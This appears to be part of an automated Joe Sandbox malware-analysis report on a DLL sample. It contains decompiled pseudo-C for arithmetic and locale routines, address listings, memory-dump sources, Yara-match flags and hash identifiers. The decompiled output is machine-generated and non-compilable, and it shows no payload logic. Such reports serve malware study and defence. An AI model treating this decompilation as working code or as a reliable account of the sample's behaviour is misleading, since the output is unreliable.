                                                                      				goto 0x8004e637;
                                                                      				r15d = 0xffffffff;
                                                                      				if (r10d == r15d) goto 0x8004e2b5;
                                                                      				asm("o16 nop [eax+eax]");
                                                                      				r10d = r10d + r15d;
                                                                      				if (r10d != r15d) goto 0x8004e290;
                                                                      				r9d = 0;
                                                                      				_v536 = 0;
                                                                      				_t24 =  &_v532; // 0xff63
                                                                      				_t285 = _t24;
                                                                      				 *__rcx = 0;
                                                                      				_t25 = _t278 + 4; // 0xf803
                                                                      				_t132 = E0000000118005053C(__rax | _t279 << 0x00000020, _t252, _t25, __rdx, __rcx, _t285, __r9);
                                                                      				__rcx[1] = r14d;
                                                                      				__rcx[2] = __ecx;
                                                                      				bpl = __ecx != 0;
                                                                      				 *__rcx = 1;
                                                                      				goto 0x8004e637;
                                                                      				if (_t132 - r10d > 0) goto 0x8004e635;
                                                                      				r8d = r10d;
                                                                      				_t269 = r10d;
                                                                      				r8d = r8d - _t132;
                                                                      				r9d = r10d;
                                                                      				_t277 = r8d;
                                                                      				if (_t269 - _t277 < 0) goto 0x8004e357;
                                                                      				_t262 = (__rdx >> 0x20) + 4 + _t269 * 4;
                                                                      				if ( *((intOrPtr*)(__rdx - _t277 * 4 - __rcx + _t262)) !=  *_t262) goto 0x8004e340;
                                                                      				r9d = r9d - 1;
                                                                      				if (_t269 - 1 - _t277 >= 0) goto 0x8004e327;
                                                                      				goto 0x8004e357;
                                                                      				_t271 = r9d - r8d;
                                                                      				_t241 = r9d;
                                                                      				if ( *((intOrPtr*)(__rdx + 4 + _t271 * 4)) -  *(__rcx + 4 + _t241 * 4) >= 0) goto 0x8004e35a;
                                                                      				r8d = r8d + 1;
                                                                      				_t213 = r8d;
                                                                      				if (_t213 == 0) goto 0x8004e635;
                                                                      				r9d =  *(__rdx + 4 + _t241 * 4);
                                                                      				r11d =  *(__rdx + 4 + _t241 * 4);
                                                                      				asm("inc ecx");
                                                                      				_a24 = r11d;
                                                                      				if (_t213 == 0) goto 0x8004e3a1;
                                                                      				r12d = 0x20;
                                                                      				r12d = r12d - 0x1f;
                                                                      				_a8 = r12d;
                                                                      				if (0x1f - _t252 - 2 == 0) goto 0x8004e3ed;
                                                                      				goto 0x8004e3b0;
                                                                      				_a8 = 0;
                                                                      				r12d = 0;
                                                                      				r9d = r11d >> r12d;
                                                                      				r11d = r11d << 0x20;
                                                                      				r9d = r9d | r9d << 0x00000020;
                                                                      				_a24 = r11d;
                                                                      				if (_t163 - 2 <= 0) goto 0x8004e3ed;
                                                                      				r11d = r11d |  *(__rdx + 4 + _t241 * 4) >> r12d;
                                                                      				_a24 = r11d;
                                                                      				r14d = _t285 - 1;
                                                                      				_v560 = _t279;
                                                                      				if (r14d < 0) goto 0x8004e5fe;
                                                                      				r15d = 0xffffffff;
                                                                      				_v64 = __r13;
                                                                      				r13d = __rdx + _t252;
                                                                      				_v552 = _t241;
                                                                      				_v568 = __r9;
                                                                      				if (r13d - r10d > 0) goto 0x8004e42d;
                                                                      				goto 0x8004e42f;
                                                                      				_a32 = 0;
                                                                      				r11d =  *(__rcx + 4 + _t241 * 4);
                                                                      				_v576 = _t262 - 4;
                                                                      				_v572 = 0;
                                                                      				if (0x20 == 0) goto 0x8004e487;
                                                                      				r8d = r11d;
                                                                      				r11d = r11d << 0x20;
                                                                      				if (r13d - 3 < 0) goto 0x8004e48c;
                                                                      				_t148 =  *(__rcx + 4 + (_v576 << 0x20) * 4) >> r12d;
                                                                      				r11d = r11d | _t148;
                                                                      				goto 0x8004e48c;
                                                                      				_t288 = _v576;
                                                                      				_t244 = _t288;
                                                                      				r8d = _t148 % __r9;
                                                                      				if (_t244 - _t327 <= 0) goto 0x8004e4b8;
                                                                      				_t297 = _t327;
                                                                      				_t289 = _t288 + 0x1;
                                                                      				if (_t289 - _t327 > 0) goto 0x8004e4f1;
                                                                      				_t267 = _t289 << 0x00000020 | _t279;
                                                                      				if (0x1 - _t267 <= 0) goto 0x8004e4ed;
                                                                      				_t298 = _t297 - 1;
                                                                      				if (_t289 + _v568 - _t327 <= 0) goto 0x8004e4d0;
                                                                      				_t164 = _v584;
                                                                      				if (_t298 == 0) goto 0x8004e5d0;
                                                                      				r11d = 0;
                                                                      				if (_t164 == 0) goto 0x8004e573;
                                                                      				r15d = _a8;
                                                                      				r8d = r10d;
                                                                      				_t306 =  >=  ? _t279 + 0x1 >> 0x20 : (_t279 + 0x1 >> 0x20) + 1;
                                                                      				r11d = r11d + 1;
                                                                      				 *((intOrPtr*)(__rcx + 4 + _t267 * 4)) = __rcx[0xffffffff00000002] - r8d;
                                                                      				if (r11d - _t164 < 0) goto 0x8004e520;
                                                                      				_a8 = r15d;
                                                                      				r15d = 0xffffffff;
                                                                      				r12d = _a8;
                                                                      				if (0x1 - _t306 >= 0) goto 0x8004e5cc;
                                                                      				r10d = 0;
                                                                      				if (_t164 == 0) goto 0x8004e5c9;
                                                                      				asm("o16 nop [eax+eax]");
                                                                      				r10d = r10d + 1;
                                                                      				_t273 =  &(__rcx[0xffffffff00000001]);
                                                                      				 *(_t273 + 4) = r8d;
                                                                      				_t230 = r10d - _t164;
                                                                      				if (_t230 < 0) goto 0x8004e5a0;
                                                                      				r10d = __r13 - 1;
                                                                      				r13d = r13d - 1;
                                                                      				r14d = r14d - 1;
                                                                      				_v560 = (_v560 << 0x20) + 0x1;
                                                                      				if (_t230 >= 0) goto 0x8004e421;
                                                                      				_t191 = _t306 + 1;
                                                                      				if (_t191 -  *__rcx >= 0) goto 0x8004e61c;
                                                                      				 *((intOrPtr*)(__rcx + 4 + ((0x1 + _t244) * _v568 * _t297 - _t271) * _t298 * 4)) = 0;
                                                                      				if (_t191 + 1 -  *__rcx < 0) goto 0x8004e610;
                                                                      				 *__rcx = _t191;
                                                                      				if (_t191 == 0) goto 0x8004e630;
                                                                      				_t192 = _t191 - 1;
                                                                      				if ( *((intOrPtr*)(__rcx + 4 + _t273 * 4)) != 0) goto 0x8004e630;
                                                                      				 *__rcx = _t192;
                                                                      				if (_t192 != 0) goto 0x8004e622;
                                                                      				goto 0x8004e637;
                                                                      				return 0;
                                                                      			}










































                                                                      0x18004e1c0
                                                                      0x18004e1d6
                                                                      0x18004e1dc
                                                                      0x18004e1e2
                                                                      0x18004e1e8
                                                                      0x18004e1ea
                                                                      0x18004e1f0
                                                                      0x18004e1f6
                                                                      0x18004e1fe
                                                                      0x18004e204
                                                                      0x18004e20e
                                                                      0x18004e213
                                                                      0x18004e218
                                                                      0x18004e21c
                                                                      0x18004e21e
                                                                      0x18004e221
                                                                      0x18004e22a
                                                                      0x18004e231
                                                                      0x18004e239
                                                                      0x18004e23b
                                                                      0x18004e23e
                                                                      0x18004e243
                                                                      0x18004e245
                                                                      0x18004e24c
                                                                      0x18004e255
                                                                      0x18004e25e
                                                                      0x18004e263
                                                                      0x18004e266
                                                                      0x18004e26a
                                                                      0x18004e26c
                                                                      0x18004e271
                                                                      0x18004e280
                                                                      0x18004e285
                                                                      0x18004e29b
                                                                      0x18004e2b3
                                                                      0x18004e2b5
                                                                      0x18004e2b8
                                                                      0x18004e2bc
                                                                      0x18004e2bc
                                                                      0x18004e2c1
                                                                      0x18004e2c8
                                                                      0x18004e2cc
                                                                      0x18004e2d4
                                                                      0x18004e2e1
                                                                      0x18004e2e4
                                                                      0x18004e2ea
                                                                      0x18004e2ec
                                                                      0x18004e2f4
                                                                      0x18004e2fa
                                                                      0x18004e2fd
                                                                      0x18004e300
                                                                      0x18004e303
                                                                      0x18004e306
                                                                      0x18004e30c
                                                                      0x18004e323
                                                                      0x18004e32d
                                                                      0x18004e32f
                                                                      0x18004e33c
                                                                      0x18004e33e
                                                                      0x18004e346
                                                                      0x18004e349
                                                                      0x18004e355
                                                                      0x18004e357
                                                                      0x18004e35a
                                                                      0x18004e35d
                                                                      0x18004e368
                                                                      0x18004e370
                                                                      0x18004e375
                                                                      0x18004e379
                                                                      0x18004e381
                                                                      0x18004e388
                                                                      0x18004e390
                                                                      0x18004e393
                                                                      0x18004e39d
                                                                      0x18004e39f
                                                                      0x18004e3a6
                                                                      0x18004e3ad
                                                                      0x18004e3bf
                                                                      0x18004e3c2
                                                                      0x18004e3c5
                                                                      0x18004e3c8
                                                                      0x18004e3d3
                                                                      0x18004e3e2
                                                                      0x18004e3e5
                                                                      0x18004e3ed
                                                                      0x18004e3f1
                                                                      0x18004e3fc
                                                                      0x18004e405
                                                                      0x18004e40b
                                                                      0x18004e413
                                                                      0x18004e417
                                                                      0x18004e41c
                                                                      0x18004e424
                                                                      0x18004e42b
                                                                      0x18004e42f
                                                                      0x18004e442
                                                                      0x18004e447
                                                                      0x18004e44c
                                                                      0x18004e452
                                                                      0x18004e459
                                                                      0x18004e46c
                                                                      0x18004e473
                                                                      0x18004e480
                                                                      0x18004e482
                                                                      0x18004e485
                                                                      0x18004e487
                                                                      0x18004e48e
                                                                      0x18004e494
                                                                      0x18004e49d
                                                                      0x18004e4ac
                                                                      0x18004e4b5
                                                                      0x18004e4bb
                                                                      0x18004e4d7
                                                                      0x18004e4dd
                                                                      0x18004e4df
                                                                      0x18004e4eb
                                                                      0x18004e4ed
                                                                      0x18004e4f4
                                                                      0x18004e4fd
                                                                      0x18004e502
                                                                      0x18004e50c
                                                                      0x18004e534
                                                                      0x18004e54a
                                                                      0x18004e551
                                                                      0x18004e554
                                                                      0x18004e55b
                                                                      0x18004e55d
                                                                      0x18004e565
                                                                      0x18004e56b
                                                                      0x18004e57d
                                                                      0x18004e57f
                                                                      0x18004e584
                                                                      0x18004e595
                                                                      0x18004e5a4
                                                                      0x18004e5ab
                                                                      0x18004e5bc
                                                                      0x18004e5c4
                                                                      0x18004e5c7
                                                                      0x18004e5cc
                                                                      0x18004e5d5
                                                                      0x18004e5e7
                                                                      0x18004e5eb
                                                                      0x18004e5f0
                                                                      0x18004e5fe
                                                                      0x18004e606
                                                                      0x18004e614
                                                                      0x18004e61a
                                                                      0x18004e61c
                                                                      0x18004e620
                                                                      0x18004e622
                                                                      0x18004e628
                                                                      0x18004e62a
                                                                      0x18004e62e
                                                                      0x18004e633
                                                                      0x18004e648

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy_s
                                                                      • String ID:
                                                                      • API String ID: 1502251526-3916222277
                                                                      • Opcode ID: 920311cc3c5fff1d31e6eba0627abcb87bf00699576b4c3ad21dc0327bf1eaa7
                                                                      • Instruction ID: 0c46df22676eff7597709d3687c79b5921587a4009a297480d4d8d69f5676e2b
                                                                      • Opcode Fuzzy Hash: 920311cc3c5fff1d31e6eba0627abcb87bf00699576b4c3ad21dc0327bf1eaa7
                                                                      • Instruction Fuzzy Hash: 88C12972714AC887D761CF19E088B9EB791F3997C8F46C125EB4643B84DB38DA49CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: rm|$4N/c$YO$B$u9E
                                                                      • API String ID: 0-3869539016
                                                                      • Opcode ID: 9a116dcf9b3a86797ace5d43516dce82c15cea16de5bd03a21175288c231a346
                                                                      • Instruction ID: 1464c8e1c385e5c6af59b4e693aed77f40da08e610083477e031b47d1ec7ff2c
                                                                      • Opcode Fuzzy Hash: 9a116dcf9b3a86797ace5d43516dce82c15cea16de5bd03a21175288c231a346
                                                                      • Instruction Fuzzy Hash: 5992F4719047888FEB58CF68D89A59E7FE1FB84384F20462DF95A872A0D774D885CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: &E$J$\$0$\$0$%
                                                                      • API String ID: 0-3783372379
                                                                      • Opcode ID: fe00409fb097cb738ccd7bb42c80f1f234878f624b9ce11e10f19b72aa3055a3
                                                                      • Instruction ID: 3b41ec419249424585b2712c62ccbf50dd5985aa45431f5ab0bdd69fb0bb074e
                                                                      • Opcode Fuzzy Hash: fe00409fb097cb738ccd7bb42c80f1f234878f624b9ce11e10f19b72aa3055a3
                                                                      • Instruction Fuzzy Hash: 4041B3B490438E8FDF49DF24C88A5DE7BB0FB58358F010A19F865A6290D7B8D664CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .M$B[!$i6F$|l
                                                                      • API String ID: 0-2516401541
                                                                      • Opcode ID: e6daa0ab7f41c0347fc06fabd1ed6e38394c3e7df53648efcc93debd0b8db4cd
                                                                      • Instruction ID: a4033c5ed8fe664813cdd0057ff8a6fc67ec2dd9ccd8d2211d3d75782ffa6ce0
                                                                      • Opcode Fuzzy Hash: e6daa0ab7f41c0347fc06fabd1ed6e38394c3e7df53648efcc93debd0b8db4cd
                                                                      • Instruction Fuzzy Hash: 87723A71912B888FEBB8CF68CC956CD7BB2FB88314F10021DD80A9B291DB765665CF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %d$et$p9$E%
                                                                      • API String ID: 0-2779957693
                                                                      • Opcode ID: 48ec8b1b1bbbc9fc28becce8326644315418b57cb87a2f48306ba2cbfa33ef8b
                                                                      • Instruction ID: 508ecbdcbe3f64c003f34ca8242cdad4917efdedf31480bbd235e40bb02a2858
                                                                      • Opcode Fuzzy Hash: 48ec8b1b1bbbc9fc28becce8326644315418b57cb87a2f48306ba2cbfa33ef8b
                                                                      • Instruction Fuzzy Hash: C432F2705097888FD758DFA8C59999AFBE2FBC4704F104A2DF4C6872A0D7B8D949CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $%\$n>$r/
                                                                      • API String ID: 0-92184183
                                                                      • Opcode ID: 27b793fcb724542a7fdcfcd2546d4cab6af2ab84d0f77cd2afb0b0177177f21f
                                                                      • Instruction ID: 35adfbc38b05368aff20b89f26cc50dda12b7587c3a5bfa36cdb6a6d5b1c4d90
                                                                      • Opcode Fuzzy Hash: 27b793fcb724542a7fdcfcd2546d4cab6af2ab84d0f77cd2afb0b0177177f21f
                                                                      • Instruction Fuzzy Hash: 3F51087060C7848FD768DF18E48979BBBE1FB98704F104A5DE88987395DB749848CB87
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ~$!|$9$R
                                                                      • API String ID: 0-2204746537
                                                                      • Opcode ID: 874daa1b041956f12758c8cf95ade3cec03e4612a361299deda00e6fff0778db
                                                                      • Instruction ID: b22486ac5cf609a67830170654ac6390e87826795ccb929490fc309f5c064c8d
                                                                      • Opcode Fuzzy Hash: 874daa1b041956f12758c8cf95ade3cec03e4612a361299deda00e6fff0778db
                                                                      • Instruction Fuzzy Hash: 8341E57091034A8BDB48DF64D48A4DE7FF0FB68398F21061DFC5A96250D37496A4CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <n$zk$K$O
                                                                      • API String ID: 0-3311339128
                                                                      • Opcode ID: 4d5dd1ff8121dded616f8b6705543aba11a68348b242f2463e98098af406854a
                                                                      • Instruction ID: 2d6f76aea97c2fb12005ed4a2c70535a0f1f0af4f524c101e3132bb7ea0214de
                                                                      • Opcode Fuzzy Hash: 4d5dd1ff8121dded616f8b6705543aba11a68348b242f2463e98098af406854a
                                                                      • Instruction Fuzzy Hash: BC31197161D745AFC388DF28C19A61ABBE1FBC8714F806A2DF486C73A4D774D8058B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;V$?q$C$]v
                                                                      • API String ID: 0-1725616403
                                                                      • Opcode ID: bdda49094d1911bb796a14ae62f81d9f56aa1ca1dcb98ca884b509e6ce0b1d15
                                                                      • Instruction ID: e9058f3e08bcb940f4a91c1330bca29029411ccbf586421e5127b4dabec3e40a
                                                                      • Opcode Fuzzy Hash: bdda49094d1911bb796a14ae62f81d9f56aa1ca1dcb98ca884b509e6ce0b1d15
                                                                      • Instruction Fuzzy Hash: 7F41B5B090074E8FDB44DF64C4864CE7FB4FB68398F210619E859A6290D374D6A5CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 48%
                                                                      			E0000000118004C364(void* __ecx, void* __edx, void* __ebp, long long __rbx, void* __rcx, void* __rdx) {
                                                                      				void* __rsi;
                                                                      				signed int _t47;
                                                                      				int _t48;
                                                                      				void* _t49;
                                                                      				void* _t55;
                                                                      				signed int _t63;
                                                                      				signed int _t72;
                                                                      				signed int _t81;
                                                                      				signed long long _t123;
                                                                      				signed long long _t124;
                                                                      				void* _t130;
                                                                      				void* _t149;
                                                                      				signed int* _t150;
                                                                      				int _t152;
                                                                      				intOrPtr* _t153;
                                                                      				signed long long _t155;
                                                                      				signed long long _t156;
                                                                      				void* _t159;
                                                                      				signed long long _t160;
                                                                      				void* _t168;
                                                                      
                                                                      				_t143 = __rdx;
                                                                      				 *((long long*)(_t159 + 0x10)) = __rbx;
                                                                      				 *(_t159 + 0x18) = _t155;
                                                                      				_t160 = _t159 - 0x120;
                                                                      				_t123 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_t124 = _t123 ^ _t160;
                                                                      				 *(_t160 + 0x110) = _t124;
                                                                      				_t130 = __rcx;
                                                                      				E0000000118003CFF0(_t124, __rcx, __rdx, _t152, _t168);
                                                                      				_t4 = _t124 + 0x98; // 0x98
                                                                      				_t153 = _t4;
                                                                      				E0000000118003CFF0(_t124, _t130, _t143, _t153, _t149);
                                                                      				_t150 =  *((intOrPtr*)(_t124 + 0x3a0));
                                                                      				_t47 = E0000000118004C6B8(_t130, _t143);
                                                                      				r9d = 0x78;
                                                                      				_t72 = _t47;
                                                                      				asm("sbb edx, edx");
                                                                      				_t48 = GetLocaleInfoW(_t152, ??, ??);
                                                                      				r14d = 0;
                                                                      				if (_t48 == 0) goto 0x8004c57e;
                                                                      				_t49 = E00000001180014B1C(_t124,  *((intOrPtr*)(_t153 + 8)));
                                                                      				_t156 = _t155 | 0xffffffff;
                                                                      				if (_t49 != 0) goto 0x8004c4b3;
                                                                      				_t11 = _t168 + 0x78; // 0x78
                                                                      				r9d = _t11;
                                                                      				asm("sbb edx, edx");
                                                                      				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x8004c57e;
                                                                      				if (E00000001180014B1C(_t124,  *_t153) != 0) goto 0x8004c445;
                                                                      				_t150[1] = _t72;
                                                                      				goto 0x8004c4ae;
                                                                      				if ((( *_t150 | 0x00000304) & 0x00000002) != 0) goto 0x8004c4b3;
                                                                      				if ( *((intOrPtr*)(_t153 + 0x14)) == r14d) goto 0x8004c48d;
                                                                      				_t55 = E000000011800552C8(_t124,  *_t153);
                                                                      				if (_t55 != 0) goto 0x8004c48b;
                                                                      				_t81 =  *_t150 | 0x00000002;
                                                                      				_t150[2] = _t72;
                                                                      				 *_t150 = _t81;
                                                                      				if ( *((intOrPtr*)( *_t153 + (_t156 + 1) * 2)) != r14w) goto 0x8004c477;
                                                                      				if (_t55 !=  *((intOrPtr*)(_t153 + 0x14))) goto 0x8004c4b3;
                                                                      				_t150[1] = _t72;
                                                                      				goto 0x8004c4b3;
                                                                      				if ((_t81 & 0x00000001) != 0) goto 0x8004c4b3;
                                                                      				if (_t72 ==  *0x80062ba8) goto 0x8004c4b3;
                                                                      				if (r14d + 1 - 0xa < 0) goto 0x8004c49b;
                                                                      				_t150[2] = _t72;
                                                                      				 *_t150 = _t81 | 0x00000001;
                                                                      				if (( *_t150 & 0x00000300) == 0x300) goto 0x8004c572;
                                                                      				r9d = 0x78;
                                                                      				asm("sbb edx, edx");
                                                                      				if (GetLocaleInfoW(??, ??, ??, ??) == 0) goto 0x8004c57e;
                                                                      				if (E00000001180014B1C(0x180062baa,  *_t153) != 0) goto 0x8004c538;
                                                                      				_t63 =  *_t150;
                                                                      				asm("bts eax, 0x9");
                                                                      				 *_t150 = _t63;
                                                                      				if ( *((intOrPtr*)(_t153 + 0x18)) == r14d) goto 0x8004c519;
                                                                      				asm("bts eax, 0x8");
                                                                      				 *_t150 = _t63;
                                                                      				goto 0x8004c569;
                                                                      				if ( *((intOrPtr*)(_t153 + 0x14)) == r14d) goto 0x8004c511;
                                                                      				if ( *((intOrPtr*)( *_t153 + (_t156 + 1) * 2)) != r14w) goto 0x8004c522;
                                                                      				if (__ebp !=  *((intOrPtr*)(_t153 + 0x14))) goto 0x8004c511;
                                                                      				goto 0x8004c557;
                                                                      				if ( *((intOrPtr*)(_t153 + 0x18)) != r14d) goto 0x8004c572;
                                                                      				if ( *((intOrPtr*)(_t153 + 0x14)) == r14d) goto 0x8004c572;
                                                                      				if (E00000001180014B1C(0x180062baa,  *_t153) != 0) goto 0x8004c572;
                                                                      				if (E0000000118004C7DC(_t72, 0, 0x180062baa, _t130,  *_t153, _t160 + 0x20, _t153) == 0) goto 0x8004c572;
                                                                      				asm("bts dword [edi], 0x8");
                                                                      				if (_t150[1] != r14d) goto 0x8004c572;
                                                                      				_t150[1] = _t72;
                                                                      				goto 0x8004c586;
                                                                      				 *_t150 = r14d;
                                                                      				return E000000011800028F0(1, _t72,  *(_t160 + 0x110) ^ _t160);
                                                                      			}























                                                                      0x18004c364
                                                                      0x18004c364
                                                                      0x18004c369
                                                                      0x18004c372
                                                                      0x18004c379
                                                                      0x18004c380
                                                                      0x18004c383
                                                                      0x18004c38b
                                                                      0x18004c38e
                                                                      0x18004c393
                                                                      0x18004c393
                                                                      0x18004c39a
                                                                      0x18004c3a2
                                                                      0x18004c3a9
                                                                      0x18004c3b8
                                                                      0x18004c3c0
                                                                      0x18004c3c2
                                                                      0x18004c3d0
                                                                      0x18004c3d6
                                                                      0x18004c3db
                                                                      0x18004c3ea
                                                                      0x18004c3ef
                                                                      0x18004c3f5
                                                                      0x18004c3fe
                                                                      0x18004c3fe
                                                                      0x18004c40b
                                                                      0x18004c421
                                                                      0x18004c438
                                                                      0x18004c440
                                                                      0x18004c443
                                                                      0x18004c448
                                                                      0x18004c450
                                                                      0x18004c45e
                                                                      0x18004c467
                                                                      0x18004c469
                                                                      0x18004c46c
                                                                      0x18004c46f
                                                                      0x18004c47f
                                                                      0x18004c484
                                                                      0x18004c486
                                                                      0x18004c489
                                                                      0x18004c48f
                                                                      0x18004c49e
                                                                      0x18004c4a9
                                                                      0x18004c4ae
                                                                      0x18004c4b1
                                                                      0x18004c4be
                                                                      0x18004c4ce
                                                                      0x18004c4d6
                                                                      0x18004c4ec
                                                                      0x18004c501
                                                                      0x18004c503
                                                                      0x18004c505
                                                                      0x18004c509
                                                                      0x18004c50f
                                                                      0x18004c511
                                                                      0x18004c515
                                                                      0x18004c517
                                                                      0x18004c51d
                                                                      0x18004c52a
                                                                      0x18004c52f
                                                                      0x18004c536
                                                                      0x18004c53c
                                                                      0x18004c542
                                                                      0x18004c553
                                                                      0x18004c563
                                                                      0x18004c565
                                                                      0x18004c56d
                                                                      0x18004c56f
                                                                      0x18004c57c
                                                                      0x18004c57e
                                                                      0x18004c5ad

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 1791019856-0
                                                                      • Opcode ID: 52e28f6c20b324a62e4c8f9d35588509636b51567f96745485e880139065356f
                                                                      • Instruction ID: ed01af84e9f56541690c3dce3bc127b132014f179a247da3b93a7e5693274500
                                                                      • Opcode Fuzzy Hash: 52e28f6c20b324a62e4c8f9d35588509636b51567f96745485e880139065356f
                                                                      • Instruction Fuzzy Hash: D661D332600E098AEBF58F15E5907ED73A1F3887C8F01C125EB9A93695DF38DA98C705
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: &6uV$Of,X$T
                                                                      • API String ID: 0-2892051533
                                                                      • Opcode ID: 0273f3564b6bf363f36fb943c18931968eb8129df83c4701b7ffcaff5b180f83
                                                                      • Instruction ID: 07a3516b80ef58ddf6f563d6da77ca74fd5014d30c04f66b3bc5870c124652b1
                                                                      • Opcode Fuzzy Hash: 0273f3564b6bf363f36fb943c18931968eb8129df83c4701b7ffcaff5b180f83
                                                                      • Instruction Fuzzy Hash: 7B42F571E14B088BDB68CFB8D45A9DDBBF2FB14344F20412DD84AAB292D7B4541ACF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <$FB$h61
                                                                      • API String ID: 0-3221223029
                                                                      • Opcode ID: 0eaf43e210efa56df5064777eb6f9afb9e184fdf3fbed814589e450bea22d2d7
                                                                      • Instruction ID: c015354b53a3918e7da9eae82dfd1454d78c9c333f7337da6749a3d3ad21a335
